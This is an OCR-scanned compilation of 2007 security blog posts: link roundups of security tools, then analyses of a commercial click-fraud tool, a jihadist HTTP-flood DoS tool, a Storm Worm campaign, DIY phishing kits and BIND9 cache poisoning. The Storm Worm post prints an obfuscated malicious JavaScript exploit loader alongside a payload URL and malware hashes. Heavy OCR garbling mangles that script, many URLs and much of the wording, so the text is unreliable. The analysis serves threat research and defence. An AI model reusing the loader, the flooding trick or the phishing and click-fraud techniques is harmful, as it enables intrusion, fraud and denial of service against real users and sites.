"This paper discusses potential security weaknesses that may be present in messaging 
systems either as a result of software flaws, application design or the misconfigurations of 
services. It focuses on TIBCO Rendezvous, as an example of a commonly used enterprise 
messaging system. Recommendations are then presented which mitigate these security 
issues." 


[10]How to Cheat at Configuring Open Source Security Tools - book excerpt 

"The perfect book and companion Web site for multi-tasked security professionals and IT 
managers responsible for securing corporate networks using the 10 most popular tools 
including: Snort, Nessus, Wireshark, Nmap, and Kismet on Windows, Linux, or Max OS X." 


[11]Controlling Website Account Information 

"When creating a website that requires authentication, the designer must keep in mind that 
passwords should be stored in an encrypted format. There must also be a password policy set 
before launching the site; this could include the password requirements as well as how the 
website and webmaster should control user passwords. The last decision to be made is how 
access will be granted to the users; this includes how they will provide credentials, how their 
credentials will be authenticated, and how to track the user’s authentication from one page to 
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another." 


[12]Security Data Visualization - book excerpt 

"In Security Data Visualization, the author creates graphical windows into the world of com- 
puter security data, revealing fascinating and useful insights into networking, cryptography, 
and file structures. After learning how to graph and display their data correctly, readers will 
be able to understand complex data sets at a glance." 


[13]US-CERT Quarterly Trends and Analysis Report, Vol. 2, Issue 2 
"This report summarizes and provides analysis of incident reports submitted to US-CERT 
during the U.S. Government fiscal year, 2007 second quarter (FYO7 Q2)." 


Security Tools : 


[14]BotHunter 

"BotHunter is a passive traffic monitoring system, which ties together the dialog trail of 
inbound intrusion alarms with those outbound communication patterns that are highly indica- 
tive of successful local host infection. When a sequence of in and outbound dialog warnings 
are found to match BotHunter’s infection dialog model, a consolidated report is produced to 
capture all of the relevant events and event sources that played a role during the infection 
process." 


[15]PDFassassin 

"PDFassassin is a module for SoamAssassin that allows for the scanning of PDF files in email 
message attachments. Email bodies are scanned upon connection and checked for PDF 
attachments. Text is extracted from the PDF via pdftotext and scanned by SpamAssassin. 
Should the PDF contain images, the gocr program is called to extract the text content." 


[16]Advanced CheckSum Verifier (ACSV) v1.5.0 

"The [17]Advanced CheckSum Verifieris an handy and fast windows utility for verifying 
integrity of files by using the [18]CRC32or [19]MD5checksum calculation algorithms for 
Windows users. It will allow you to verify the accuracy of your data after you burn a CD or 
transfer a files over a network. Adding an little checksum file to your data files will allow in 
further easily to verify their integrity at any time." 


[20]Blue Pill Project 

"The New Blue Pill is significantly different from the original Blue Pill, not only because of the 
various features that it implements, but also because of the different architecture it was based 
on (HVM-like approach, similar to that used by XEN 3)." 


[21]PyFault - Python Based Fault Injection in Win32 Based Application 

"PyFault is a python library aimed at fault injection scenarios in Win32 based applications. 
Currently it only implements a DLL injection and ejection mechanism, but we aim to add more 
functionality to it,and of course all requests are welcome." 


[22]Astaro Security Linux 6.311 

"Astaro Security Linux is an all-in-one network security gateway that includes a firewall, 
intrusion protection, virus protection, spam protection, URL filtering, and a VPN gateway. 
Features include stateful packet inspection, deep packet filtering, intrusion detection and 
prevention, portscan detection, content filtering, virus detection for email and Web traffic, 
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profile handling, IPSec, SSL, and PPTP VPN tunneling, spam blocking, proxies for HTTP, FTP, 
POP3, SMTP, DNS, VoIP, SOCKS, and Ident, logging, and reporting." 


[23]EasyIDS v0.2 

"EasyIDS is an easy-to-install intrusion detection system based upon Snort. EasylDS is 
designed for the network security beginner. EasyIDS includes CentOS Linux, Snort, MySQL, 
BASE, ntop, oinkmaster, and more." 


[24]Trace Explorer 

"Trace Explorer aggregates traceroutes to many popular websites and makes them searchable, 
allowing you to discover which web sites are hosted near each other, at a particular ISP, or 
behind a specific router." 


[25]SAGATOR 

"SAGATOR is an email antivirus/antispam gateway. It is an interface to any smtpd, which 
runs an antivirus and/ or spam checker. Its modular architecture can use any combination 
of antivirus/sopam checker according to configuration. It currently supports clamav, nod32d, 
AVG, sophos, TrendMicro AV, Symantec AV, spamassassin, bogofilter, and quickspamfilter." 


[26]Firefox: 10 tips to bolster your privacy 

"In this hack, we’re going to highlight 10 tips to bolster your privacy when surfing the Internet 
with Firefox. You can use any of these tips to add an extra layer of privacy to your browsing 
at work, on public computers or just on a shared computer at home." 


[27]Binary Tools 
"reverse: takes the input file, reverses it (first byte becomes last byte, ...) and writes it to a 
new file. middle: extracts a sequence of bytes from the input file and writes it to a new file." 


[28]IM-Filter 

"|M-Filter is a daemon that runs on a firewall and filters ICQ traffic. The daemon can identify 
file transfers, handle UIN and word blacklists, manage a list with currently logged in users. 
and log messages sent via the ICQ protocol." 


[29]Jesse’s JavaScript compiler/decompiler fuzzer 
"This fuzzer constructs random strings with JavaScript statements andexpressions (sometimes 
with syntax errors), and asks the JavaScript engine totreat them as functions." 


[30]50+ Firefox Add-ons For Security and Privacy 

"While these issues are best fixed with a soon-to-be-released patch*, we were inspired to look 
at the wider issue of keeping your Firefox browser secure. We present a plethora of security 
extensions for Firefox, followed by those that will keep your private data....private." 


[31]The Crypto CD 
"CryptoCD is a collection of software that provides secure communication through the Internet. 
The programs cover tasks like email encryption, secure chat, and anonymous Web browsing." 


[32]GMER 
"GMER is an application that detects and removes [33 ]rootkits." 


[34]RenaissanceCore 0.9.0 
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"The RenaissanceCore IDS consists of four components: a stateful IDS sensor, a graphical 
user interface, a database backend, and a two-way interface between the IDS sensors and the 
database. Each component can run on a separate host." 


Sevices & Misc: 


[35]The Pwnie Awards 
"An annual award ceremony celebrating (or making fun of) the achivements and failures of 
security researchers and the wider security community." 


[36]USB patch released. HALLELUJAH! 
"The patch was written for and, therefore, tested on Apple TV software version 1.0. If you 
have 1.1, the patch might not work. Please let us know if you can get the patch to work on 1.1." 


[37]Wordpress ZeroDay Vulnerability Roundhouse Kick and why | nearly wrote the first 
Blog Worm (updated) 

"Much time has passed since | wrote the last [38]Full DisclosurePublication on this Blog, it was 
about the [39]security vulnerability in Akismet, a Wordpress antispam plugin. This time you 
will witness something which impacts huge parts of the Blogosphere, | will tell you my story." 


[40]The Story of DEFCON - Video 

"Jeff Moss, the founder of DEFCON and Black Hat, tells the history of the largest hacker 
conference and how it all got started. Find out more about the early days of the hacking scene 
when dial-up was considered fast, how the security soace changed around the conference as 
years went by, and discover some bizarre things that take place at the event." 
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25. bttp://www.salstar.sk/sagator/ 


. http://www. security-hacks.com/2007/06/08/firefox-10-tips-to-bolster-your-privac 


27. jeep: //akdierstevens. wordpress. con/prograns/binary-tools/ 


. http: //didierstevens.wordpress.com/programs/binary-tools/ 


28. bttp://im-filter.sourceforge.net/ 


. https://bugzilla.mozilla.org/show_bug.cgi?id=jsfunfuzz 


30. http: //mashable.com/2007/07/25/firefox-security/ 


31. : : / 


http: //cryptocd.org 
. http://www. gmer.net/index.php 
33, http: //eu wikipedia. org/vita/RootEi 
http: //pwnie-awards.org 


. http: //en. wikipedia. org/wiki/Rootkit 
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34. http://sourceforge.net/projects/renaissancecore 


35. : = .org/ 


36. http://www. appletvhacks .net/2007/07/28/usb-patch-released-hallelujah/ 


. http://mybeni.rootzilla.de/mybeNi/2007/wordpress_zeroday_vulnerability_roundhouse_kick_and_why_i_nearly_ 
rote_the_first_blog_worm/ 
38. http://mybeni.rootzilla.de/mybeNi/category/disclosure/ 


. http: //mybeni .rootzilla.de/mybeNi/2007/wordpress_akismet_xss_security_flaw_beware_of_the_dog/ 


40. http: //www.youtube.com/watch?v=1g6bQMT jHCE 


3.8.3 A Commercial Click Fraud Tool (2007-08-08 16:35) 


Start Stop Register Help 
Proxy List | URL Lists | Configuration Progress Window | 


headstrong sai 
webclicker : distaneétohere org 


12** 


me 101000001001 00 


This version is for evaluation purposes only. 
Foronly 25 Euro (private license) you will get: 
+ no proxy limitation 
¢ no URL limitation 
¢ random user agents 
¢ uses two threads for dual speed 
* lifetime updates for free 


+ a demo prox; list 


Secure Online Registration 
WebClicker Homepage 
Latest Proxy Lists by Atomintersoft 


UNREGISTERED SHAREWARE 


India’s secret [l]army of "ad clickers" employed on a revenue sharing basis is an already 
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well known threat to the future online advertising, especially with its cost-effective model of 
[2]outsourcing click fraud to human clickers, and while the public’s attention is always orbiting 
around [3]the use of botnets to commit click fraud, in the vary same way we have [4]malware 
pretending to be a RAT, and [5]spamming tools pretending to be email verification ones, we 
also have commercially available web clickers, while they’re in fact click fraud tools. Click, 
click, click, or click once only to have a web clicker automatically aggregate and verify working 
proxies in between launching multiple threads against a web site presumably owned by the 
clicker? And no botnet needed? A commercial click fraud tool called, well, [6]the Web Clicker : 


"uses public proxies to load and click those banners. Advertisement systems will recognize 
every proxy as a single unique user clicking on the banner.Server administrators have to get 
aware of this heavy security hole, as customers may use this program to earn hundreds of 
dollar a month! You as a server administrator and software developer have the opportunity 
now to test your own servers to improve protection and to detect possible cheating schemes.If 
you need additional information, check the links below or try WebClicker right now! You can 
take a look at some [7]WebClicker screenshotsfirst if you like." 


In previous posts "[8]Latest Report on Click Fraud", and "[9]AdSense Click Fraud Rates", | 
pointed out that click 


hh HeadStrong WebClicker 2.55 2 -(O] x} 


Account Pause Stop Help 


About/Info | Proxy List | URL Lists | Configuration A 


-{ Overview } 


Thread One: SKIP | 
Current Proxy: (4 of 17) 152.158.247.97:80 
Current URL: (1 of 3) http:/Avww.yahoo.com/ 
Last Status: [4] getting data (5640 bytes) 


Thread Two: SKIP | 
Current Proxy: (3 of 17) 148.233.111.232:80 
Current URL: (2 of 3) http:/Auww.altavista.com/ 
Last Status: [3] getting data (10929 of 10929 bytes) 


-{ Advanced } 
Successful (HTTP 200 OK): 4 

Thread One Failed (any other response): 0 
Thread Two Connection failed: 0 

[1] getting data (16216 of 18675 bytes) 

[1] getting data (17576 of 18675 bytes) 

[1] getting data (18675 of 18675 bytes) 

[1] connecting to proxy 195.24.18.85:30 

[1] getting data (3646 of 11656 bytes) 

[1] getting data (10446 of 11656 bytes) 

[1] getting data (11656 of 11656 bytes) 

[1] connecting to proxy 195.24.13.85:80 

[1] getting data (22713 of 23983 bytes) 

[4] getting data (23983 of 23953 bytes) 

[4] connecting to proxy 152.156.247.97:60 

[4] getting data (5640 bytes) >| 


ae 


To Simple Mode | Save Logs | HTTP Debug | 


REGISTERED TO: HEADSTRONG SOFTWARE 


fraud has become so evident that : 
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"Third party companies emerged and started filling the niche by coming up with click fraud 
analytics software so that Google’s major customers, even the small to mid-size business could 
take advantage of an automated way to analyze click anomalies." 


And while Google are publicly admitting that click fraud is a fact and commissioning [10]third- 
party analysis of their actions to detect and prevent it, such commercially available tools re- 
quire no botnets, but a minor investment in proxy servers providing service, and the software 
itself. Finally, India’s army of "ad-clickers" will achieve fraudulent economies of scale if em- 
powered with such tools. Some issues to keep in mind : 


Overall Click Fraud Rate By Quarter 


z 
b | 
Co 
< 
3 14.75 
< 
4 
an 
0 


Q3 - 2006 Q4 - 2006 Qi - 2007 Q2 - 2007 


( Quarter } 


- The tool can be used as a click fraud assessment one, so that ad networks can verify their 
susceptibility to such applications, or webmasters the detection rate of their [11]click fraud 
analyzing solution. The main concern is that the tool is sold on a volume basis, so malicious 
parties can easily obtain it in between the ones they’re already using 


- Each and every security vendor has a huge database of malware infected, soam and phish- 
ing emails sending IPs, and while they’re already figuring out ways to commercialize these 
databases, an ad network could greatly benefit by integrating such data within their system 
and thinking twice before counting a click from these hosts 


- The more the advertiser is aware of the click fraud problem, the more would her requirements 
and expectations become. If advertising networks based on a CPC model don’t build better 
awareness on their mitigation practices, the entire CPC ad model is at stake 


Here are some tips on [12]DIY click fraud prevention, [13]Yahoo’s and Google’s comments 
on the latest report released by Click Forensics, [14]a report on Combating Click Fraud with 
interesting perspectives on the possible tactics, and a very in-depth analysis of [15]advertising 
models and how fraudulent publishers benefit from them. 


Overall click fraud rate per quarter courtesy of the [16]Click Fraud Network. 


1. http: //timesofindia.indiatimes.com/articleshow/msid- 654822, curpg-1.cms 


2. http://www. indiana. edu/%7Ephishing/papers/gandhim. pdf 


3. http://www. informationweek.com/news/showArticle. jhtml?articleID=201002161 
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| 

ttp://ddanchev .blogspot.com/2007/04/shots-from-malicious-wild-west-sample.htm 
| 

| 

1 

| 
10. 
1 
| 

. http://www. forbes. com/technology/2007/07/22/clickfraud-google-yahoo-tech-cx_pco_0720paidcontent .html 
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3.8.4 A Cyber Jihadist DoS Tool (2007-08-08 21:25) 


Engine ver 


Sacks Proxy 


I’ve seen [1]mail bombers courtesy of chinese hacktivists released during the [2]China/U.S 
cyber skirmish, [3]Jencryption tools released by cyber jihadists, and now we have a fully 
working multi-thread HTTP GET flooder for attacking "infidel" sites as the authors put it. The 
tool itself and the tutorial pointing to ping flooders circa 1999 aren’t disturbing. What’s 
disturbing is the time when cyber jihadists stop re-inventing the wheel to achieve a better 
branding effect, and start [4Joutsourcing their DDoS needs to groups who are vulnerable to 
a single weakness only - lack of ethics and the financial proposition they’ll get. The numbers 
within the screenshot are part of a descriptive tutorial on how to use the tool, which is a part 
of the cyber jihadists’ al-jinan.org DDoS initiative, so basically once cyber jihadists download 
E-jihad, the tool periodically "phones home" to obtain IPs of sites to be attacked and included 
in the DoS tool. [5]Here’s more info : 


"The "Electronic Jihad Program" is part of the long-term vision jihadi Web site Al-jinan.org has 
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the Internet as a weapon, something that affects any organization that relies on the Web. 
Electronic Jihad allows users to target specific IP addresses for attack in order to take any 
servers running at those IP addresses offline. The application even includes a Windows-like 
interface that lets users choose from a list of target Web sites provided via the Al-jinan site, 
select an attack speed (weak, medium, or strong), and the click on the "attack" button." 


Moreover, despite that the al-jinan.org’s "Electronic Jinhadists Against Infidel Sites" cam- 
paign is shut down, the initiative is constatly switching locations, and is currently active at 
another domain. Compared to aj-jinan.org’s E-jihad app that was distributing the IPs to be 
attacked, this campaign only recomments the use of a ping flooder. You can also amuse 
yourself wih this [6Jattack technique. The idea is to open 5 IFRAMEs, and reload them every 
5 seconds, the site under "iframe attack" is islam-in-focus.com. Aspirational initiative, with 
thankfully lame execution. 


1. http: //ddanchev. blogspot .com/2006/09/chinese-hackers-attacking-us. htm 
2. http: //www.cmc.gov.my/what_we_do/ins/IndustryTalk/Presentation1.pdf 
3. http: //ddanchev. blogspot .com/2007/04/mujahideen-secrets-encryption-tool htm 


4. http: //ddanchev. blogspot .com/2007/05/ddos- on-demand-vs-ddos- extortion. htm 


. http://www. informationweek.com/shared/printableArticle. jhtml?articleID=200001943 


5 
6. http: //members.lycos.co.uk/ds166/page6/dsli.htm 
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3.8.5 The Storm Worm Malware Back in the Game (2007-08-09 15:24) 


<Script Language="JavaScript’> function xor_str(plain_str, xor_key){ var xored_str = ""; 

for (var i = 8; i < plain_str.length; ++i) xored_str += String.fromCharCode(xor_key ~ 
plain_str.charCodeat(i)); return xored_str; } var plain_str = 

“\xSc\x76\x76\x Ba\xid\xGeyxSc\xt1\xt1\xSc\xut\xSc\xi2\x19\ x Ob xSc\x3d\x Be\xGe\xid\xO5\x54\x5 
\x76\xGa\xid\x Be\xSc\xt1\x19\xt1\x23\xtayxt By xid\ x1 D\xSc\ xe xScyxsc\xS7\x76\x76\x1a\x89\x12 
XOB\XAIS\XTB\ x1 2\xSc Vx Tey xSe\ x55 \xSc\x G7 Vx q1\xq1\ x St xt1 xt xe 7\xSc\x GF \x19\ x GB\x2B\ x15 \x11\) 
13\xO9\x O8\xS4\xSe\x14\xS4\x55\xSe\xSO\xSc\xse\xhc\xsc\xsc,\xS5\x47\x 81 \x76\x76\x1a\x O9\x12\x 
BY\XIS\XTIB\K12\x5c\x 1D\X19\x BBY x Te\x54\xte\xSB\xSc\xte\x2F\x15\x G6\x19\x55\x76\xO7\xOb\x14\x1 
\KXT9\KSC\KSS\X Te \x52\X1B\K19\ 12) % 1D\ x OB X14 X56 \ x Se \ X4O\XTE\X2FL X15 \ x B6\X19\X55\xO7\x1e\x5c 
X4INKSC\XTE\X4S7\XOTVX76\ x Te\XSC\K4S1\x5C\x Te \x52\ x BF \ x O9\ x 1e\ x BFL x O8\ x Be\XIS\XT2\X1ID\XS4\x4c\y 
TE\KZFAKIS\X BOA XT9\XSS\K4OLKSS X47 \ x BE\X19\ x OBL x O9\ x Be\XT2\KSC\x TEV X47 \XOT\X76\K76\xKTa\ x O9\x 
FAXOB\KIS\XTS\KT2\KSC\XTFEAKTa\ KS a\ xS5\x76\KO7\x Bal x1d\ x Be\xSc\ x G6\ xt FV XSc\ xed xScV\xuc\ x Bax 
\RECAXTEAKSC\KTE\ KUC\XTFE\KS7\x76\x Bal xTd\xGe\xSc\xid\ xSc\ xt \xSc\x OO, x1 2\x19\ x GF xt \xid\x 8c 
*S4\xSe\x59\x O9\ x48 \ XSF KEB\KSE\KS9O\ x OO\ KNB KSE\ XSB\ XSF KSO\XOO\ KSC \ x Ta x19 \xTe\xSO\x OO, xuFy 
HO\XAE\KS9\ x O9\ x4 a\ x4AY KFA KNS\X59\ x BON KH KNC\ X10 \ X45 \X5S9\K BO\XHE\ X40 \ XC \XHd\XS9\x B9\X19\x 
F\XSF\xSe\xSc\xS7\x76\xS5e\x59\ x O9\ x 19\ x de \ KSB\ XSF XS 9\ xX B9\X19\ x Te\xTa\x Td \ xS9\xBO\x19\ xSay xa 
\xX59O\xKG9\xTa\ x Ta\xT9\xTF\xS9\ x O9\ x Ta\xta\xta\xta\x59\ x B9\ x44 x TeV xab\xta\x59\xB9\x1B\x1a\ x48 
XSO\KOO\KT9\X Ta\XT9\ x Ta x59\ x O9\ x4a\ X4BYKT9\K Ta X59) x O9\X TOV KSFELK IOV K Ta xS9\XB9\ X45 x Ta\x4day 
SIO\XB9O\K4B\ x 4e\ x Ta XSF x59) x B9\ X45 \ x Ta x4a\ x4B\x59\ x O9\ X4aL TOL KT9\ KAD XSO\ KX BO KTO\ KX Ta xe \x 
O\KBO\KTO\K Tax T9\xTe\xSe\xSc\ x57 \x76\x5e\ x59) x O9\ xHa\ XUB\ X19 Ta x59) x B9\ xX TeV KES KU KGFE\ XS 
\X4 aN KEKE KED\XSO\KOO\KT9O\ Kad x Td \ x4d\xS9O\ x O9\ x4c\ x4D\xXuc\KhF\xSO\x B9\x19\xTa\xud\xud\ x59 
KDA xTa\K19\xtayxSO\xBO\xtd\xtd\x4a\x4ayx5O\ x BO\xteyx4S\x19\ x te, x59) x O9\ xe \ KUED KSA xhbD\ x59, 
Ha\xhO\ xhd\ xd \x59\x G9\ x4 \xSD\x19\ x4d\xS9\x O9\x19\xta\xed\xtayxS9\xO9\x19\xtayxiey\xtayxso\x 
d\x1d\x4a\xSa\xS9\xB9\xte\xs5\x19\x4b\xSeyxSc\x57\x76\x5e\xS9\x B9\ x1 F\x 1d \ xXS4\xeb\x59\ x O9\ x4 
\x49\x1a\x59\x O9\x4c\x4b\xhe\ x 1B\xS9\x B9\x19\x Ta\x4e\x1B\xS9\xB9\x19\x ay x19\xta\xSo\xoo\xid 
x4a\xha\x59\x O9\x Te \ KAS \x19\ XSF \ x59) x OP) KNC\ KSC) KSS\ X4D\X5S9\ x B9\ KCL 1a x4e\x4d\ xS9\x89\x4c\y 
HYUN XTANKSO\X BOK TIX TAL XSF X TEN XS OVX BI\K TILK TANK TOV X Ta xSO\xXG9\ x Td\ x 1d\ x4a\ x4a\x59\ x B9\xTe\x 
BANK Ta KS9\ x O9\ x 4O\KT9\ KES KED\KS9\ X BOL KHC\RIG\ RSS \ x4a\ xSe\XSCVURS 7X76 \X5O\XS9\ KOOL K4C\X4D\X4 
AKSO\KBO\KT9O\ x Ta x4e\xeS\xSO\ x OOK T9\XTaAVKT9O\x Ta xSO\xB9\ xd xd xsa\xda\xso\xo\xtd\xta\xta 
RSO\XOO\KIB\X4ED\ x4a\xTayxSO\ x BO\ x45 \xid\xhe\xtF\xS9O\ x O9\ xual xhal\ xd \ x49\x59\xO9\xta\xub\xid\ 
SO\KGO\KT9\ KGa xc \ xa xSO\x BO x19\ xa xt9y\xtO\xS9\ x O9\ x te nud x19\ xray xSO\xBO\xuS\xid\xua\x 
O\xO9\xha\ xB x1 F\xtey\xSO\xG9\x19\xteyxid\xtd\ xS9\ x O9\ x19, x19\ Khe xh9\ xSeyxScyxS7\x76\xSeyxs 


After coming across the story on how [1]Storm Worm is taking over the world for yet another 
time, | wondered - who are the novice malware authors behind Storm Worm that [2]switch 
tactics by the time their old ones become inefficient? After commenting on [3]the first Storm 
Worm wave - it’s not even a worm - with an emphasis of the outdate social engineering 
techniques it was using back in January, 2007, it’s time we assess the current situation and 
how have Storm Worm evolved. What has changed? Direct .exe email attachments matured 
into a direct link to an infected IP address. Mass mailings are now sent with campaign ID to 
measure efficiency. Outdated social engineering tactics became a direct exploitation of old 
and already patched vulnerabilities to ensure a higher probability of infecting the visitor whose 
lack of understanding on how client side vulnerabilities should get a higher priority compared 
to visual .exe vigilance often result in an infection. Here’s a sample infected IP spreading 
Storm Worm binaries : 


Message content : "Your Download Should Begin Shortly. If your download does not 
start in approximately 15 seconds, you can click here to launch the download" 

Original URL : 77.96.240.142 /?232c3a9ebeed435601e5ee71 

Binary URL : 77.96.240.142/ecard .exe 

Server response : HTTP/1.1 200 OK 

Server: nginx/0.5.17 

Date: Thu, 09 Aug 2007 00:12:15 GMT 

Content-Type: text/html 

Transfer-Encoding: chunked 
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X-Powered-By: PHP/5.2.1 


Email spoofed from : "postcards.com" jyg @ alltel.net 

Mail server : exchange.moneytreemortgage.biz, [4]64.220.230.118 
IP blacklisted by : SoamCop, CASA-CBL, UCEPROTECTL1, PSBL 
Sender’s IP : 73.208.110.36 

IP blacklisted by : Spamhaus PBL, NJABL Dynablock 


ecard.exe 

Detection rate : 17 AVs out of 32 detect it (53.13 %) 
File size: 113195 bytes 

MD5: 63fe9896fbbca6471ec216c9dee0b0e9 

SHA1: 170eb66ca28f74d291e07a0383564b465d373f06 


file.exe - downloader 

Detection Rate: 17 AVs out of 32 detect it (53.13 %) 
File size: 4608 bytes 

MD5: 7ea2baadfe3a8a54635cea72526ff391 

SHA1: ae32bb7df491fb52650144931c10a7bd5ebf6a2c 


alt.exe 

Detection Rate : 17 AVs out of 32 detect it (53.13 %) 
File size: 113168 bytes 

MD5: 4ac8a3242e945215469ec08bc5603418 

SHA1: 75b8aadab3626e39b570d7e7494d3be63cc582d1 


At every infected IP acting as a web server, we have a typical [5]MPack style XOR-ifying 
javascript obfuscation. And while it’s not that hard to deobfuscate it, the interesting part is 
the type of vulnerabilities exploited to obtain the downloader and the payload. The current 
Campaign is a good example of [6]a fast-flux network as the malware authors used one mail 
server to sent the email, another IP as actual sender, and a third one where the payload, the 
downloader are [7]hosted with the [8]web page itself using the [9]Q4-06 Roll-up package 
exploits kit : 


"This is [10]a set of exploit scriptsmostly from the end of 2006. It includes an MS06- 
042, a SetSlice, an MDAC, a WinZip, and a QuickTime. It is typically encrypted using a wide 
variety of javascript obfuscators, but is usually about the same source code underneath. 
Recently it sometimes includes an ANI exploit from April 2007." 


As we have already seen with the most recent and wide scale malware campaigns, such 
as with the IcePack’s and MPack’s kits, the malware authors are entirely relying on patched 
vulnerabilities compared to [11]purchasing zero day ones, further fueling the [12]superficial 
zero day vulnerabilities cash bubble, and proving that using old vulnerabilities is just as 
effective as using a zero day one - they are both unpatched at the end user’s PC. Ensure 
[13]attacks using outdated vulnerabilities cannot take place by patching, and don’t forget that 
Storm Worm is among the many other [14]malware and [15]spam oubtreaks currently active 
in the wild. 


Related posts: 
[16]Malware Embedded Sites Increasing 
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[17]Massive Embedded Web Attack in Italy 
[18]The MPack Attack Kit on Video 

[19]The WebAttacker in Action 

[20]The IcePack Malware Kit in Action 

[21]The Underground Economy’s Supply of Goods 


More info: 

[22]Malware - Future Trends 

[23]New wave of nuwars storming in 

[24]Storm Worm Continues to Spread 

[25]The Storm Worm 

[26]Storm Worm growth is getting out of hand, researchers fear 

[27]Storm Trojan Worm evolves and creates Havoc on the Internet, warns SecureWorks 
[28]Storm Worm’s Virulence May Mean Tactics Change 

[29]Storm Worm Hype Batters Media 


ftp: //it slashdot ong/it/07/06/08/1416248, ht 
| hetp://adanchev blogspot. con/2007/02/ storm vorn-svitching- propagation. Heal 
_ http: //adanchey blogspot. con/2007/01/social- engineering and-nalvare. tal 
_http://wvy. projecthoneypot .org/s, 5d0Bect2aee3¢906£01540404081454 

_ http: //adanchey blogspot. con/2007/06 /exploits~serving-donains nt 


ttp://ddanchev .blogspot.com/2007/07/feeding-packed-malware-binaries.htm 


ttp://www.informationweek.com/story/showArticle. jhtml?articleID=196902970 


. http: //www.dragoslungu.com/2007/03/12/top-5-web-exploits-for-february-2007/ 
. http://explabs. blogspot .com/2007/04/webattacker-is-dead-long-live.htm 


10. http://www.viruslist.com/en/analysis?pubid=204791956 
11. http://ddanchev. blogspot .com/2007/07/zero-day-vulnerabilities-auction.htm 


12 

13. 

14. http://ddanchev. blogspot .com/2006/06/real-time-pc-zombie-statistics.htm 

15. 

16. 

17. http://ddanchev. blogspot .com/2007/06/massive-embedded-web-attack-in-italy.htm 

18. 

19. 

20. http://ddanchev. blogspot .com/2007/07/icepack-malware-kit-in-action.htm 

21. 

22. 

23. http://www.avertlabs.com/research/blog/index. php/2007/08/07/new-wave- of -nuwars-storming-in/ 

24, 

25 

26. http://tech.blorge.com/Structure :420/2007/08/03/storm-worm- growth-is-getting-out-of-hand-researchers-fe 
27. http://www.techshout .com/internet/2007/04/storm-trojan-worm-evolves-and-creates-havoc-on-the-internet- 
28. 

29, 
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3.8.6 DIY Phishing Kits (2007-08-13 13:30) 


Eile 


ion. 


Double Click Me to erase all text. 


Rock Phish’s efficiency-centered approach in terms of [1]hosting numerous phishing pages on 
a single domain, often infected home user’s host, easily turned it into the default application 
for DIY phishing attacks. And despite that we still haven’t seen a multi-feature phishing kits 
like the ones I’m certain will emerge anytime now, here’s an automatic URL redirector of data 
submitted to a phishing site that’s showcasing the ongoing DIY phishing kits trend. Basically, 
once the source code of a, for instance, fake paypal login page is pasted, it will ensure all the 
submitted accounting data is forwarded to the malicious server where it gets logged. The 
main aim of this tool isn’t to achieve mass scale efficiency as is the case with Rock Phish, but 
to make it easier for phishers to poin’n’click create or update the fake pages to be hosted on 
a Rock Phish domain. The program’s intro : 


"Steps to creating a fake login, simple as 1,2,3.. Go you your web site or the site you 
have permisson to make a fake web login and right click then press "Source". Double click 
here to begin. Enter the redirection URL. The redirection URL is the site in which the user who 
enters their login details will be forwarded to after they fill out the form. Optional : For some 
web sites after you creat the phisher some images will not load properly. This is due to the 
source directing the images to be loaded from your database instead of their database. For 
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example you will probably find this in your source img src="/images/image.gif". To fix this you 
would have to direct the source to load from the site’s database by editing the source to look 
a little like this img src="http://site.com/images/image.gif". To automatically do this double 
click here." 


Why are DIY phishing kits turning into a commodity, and what are some of the strate- 
gies to deal with phishing sites? 


- fake pages for each and every financial institution plus the associated images are a 
commodity. They look like the real ones, sound like the real ones, but anything submitted 
within gets forwarded to a third party presumably using DIY tools like these 


- phishing should be treated as spam, namely it should never reach the end user’s mail- 
box, but as we’ve already seen in the past, certain financial institutions are trying to [2]rebuild 
confidence in the email communication with their customers whereas they should build 
more awareness on how they’d never ever initiate such communication as it will create even 
more confusion for the customer, the one who’s still not aware of the basic phishing techniques 


- HTTP referer logs to static images via email clients or web based emails could act as 
an early warning system and provide a list of URLs to be automatically feeded into a to-be 
shut down tracking system, ones [3]we’ve seen getting commercialized [4]by vendors already 


- Phishing has become such a widespread problem that he latest versions of [5]IE and 
[6]Firefox now have anti phishing protection built-in. Moreover, phishing sites are known to 
[7]exploit browser vulnerabilities to hide [8]the real .info and .biz extension of a site, so that a 
built-in [9Janti phishing toolbar picks up where the browser can no longer perform. 


As far as the recent increase of [10]Rock Phish domains is concerned, DSLreports.com 
has been keeping track of, and [11]shutting down Rock Phish domains for a while. Once shut 
down, new domain names usually recently dropped ones appear online, such as userport.li 
and userport.ch for instance. Go through an article on "[12]The History of Rock Phish" as well. 


. http://ddanchev. blogspot .com/2007/07/confirm-your-gullibility.htm 


ttp://ddanchev.blogspot.com/2006/04/heading- in-opposite-direction.htm 


ttp://ddanchev.blogspot.com/2007/03/take-this-malicious-site-down.htm 
ttp://ddanchev. blogspot .com/2007/04/taking-down-phishing-sites-business.htm 


1 
2 
3 
4. 
5. netp:/ologs.nsda.con/se/archive/2005/06/24/450569. aspx 
6 
7 
8 


ttp://www.informationweek.com/news/showArticle. jhtml?articleID=201305816 


. http://www. channelregister.co.uk/2007/07/25/firefox_url_bug/ 
. http: //news.com.com/Phishingthole+discovered+intIE/2100-1002_3-5495719.htm 
9 


ttp://ddanchev.blogspot.com/2006/03/anti-phishing-toolbars-can-you-trust .htm 


10. http://www.dslreports.com/forum/r17714410-Rock-phish- informatio 


ttp://www.dslreports.com/forum/r17714410-Rock-phish-information~start=240 


12. http://www. crmbuyer.com/alert/58648 .htm 
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3.8.7. Pharming Attacks Through DNS Cache Poisoning (2007-08-13 16:58) 


SCM Warning 


‘ SCM Warning for 
www.google.co.uk 


The website you have just visited is on a different IP address 
than the last time you were there. The SCM add-on tried to verify 
the IP change, the verifications failed as shown below: 


SCM Test Results 


66.249.89.99 
66.249.89.104 
127.0.0.1 
66.249.89.147 


©OK Error Unknown New © Old 


Please confirm the website IP change with the website owner and 
choose one of the buttons below to continue. Pressing Cancel is 
equivalent to accepting the IP change for 1 minute. 


Always Accept Accept Changes | | Cancel | 


A month ago, a detailed assessment of a recently released [1]vulnerability in BIND9 was 
conducted by Amit Klein to highlight the wide impact typical nameserver vulnerabilities have 
in general, and this one in particular. Now that [2]an exploit is available as well, the possibility 
for large scale pharming attacks in an automated fashion, becomes fully realistic : 


"A [3]programhas appeared on the MilwOrm exploit portal which is able to exploit the 
recently [4]reported vulnerabilityin the BIND9 nameserver. Transaction IDs can be predicted 
or guessed relatively easily, so the cache of a vulnerable nameserver can be poisoned. Phish- 
ers can use [5]cache poisoningfor pharming attacks on users by manipulating the assignment 
of a server name to an IP address. Even if the user enters the name of his bank in the address 
line of his browser manually, he will still be taken to a counterfeit web page." 


[6]Pharming, like any other threat usually receives a cyclical media attention, either prompted 
